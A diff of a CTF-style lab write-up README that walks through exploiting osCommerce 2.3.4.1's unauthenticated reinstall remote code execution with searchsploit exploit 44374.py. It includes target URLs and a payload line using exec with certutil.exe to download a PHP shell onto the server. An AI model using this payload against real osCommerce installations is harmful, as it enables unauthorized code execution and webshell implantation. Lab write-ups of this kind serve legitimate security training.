gkhns/blueprint-/README.md

-A quick **serchsploit** search on **osCommerce 2.3.4** shows the following vulnerabilities:
+A quick **searchsploit** search on **osCommerce 2.3.4** shows the following vulnerabilities:

 ![image](https://user-images.githubusercontent.com/99097743/170889834-7bc4cd09-df46-41b0-ac76-48e7dc3e57ae.png)

 **Exploit title: osCommerce 2.3.4.1 - Remote Code Execution (PATH: php/webapps/44374.py)**

 * It is an interesting exploit as it does not require credentials.
-* An unauthorized attacker can reinstall, ff installation directory has not been removed.
+* An unauthorized attacker can reinstall if installation directory has not been removed.
 * During the reinstallation process, OS commerce does not attempt to do any authentication, it simple executes the code.

-We need to update the followings inputs:
+We need to update the followings inputs in 44374.py:

 1) base_url: base_url = "http://10.10.83.191:8080/oscommerce-2.3.4/catalog/"
 2) target_url: target_url = "http://10.10.83.191:8080/oscommerce-2.3.4/catalog/install/install>
-3) Payload: payload += 'exec("certutil.exe -urlcache -f 10.10.83.191:8080/shell.php shell.p>
+3) Payload: payload += 'exec("certutil.exe -urlcache -f 10.10.83.191:8080/shell.php shell.php>

 ![image](https://user-images.githubusercontent.com/99097743/170901248-239aad25-20dc-48a4-9e8d-b17b2190bffe.png)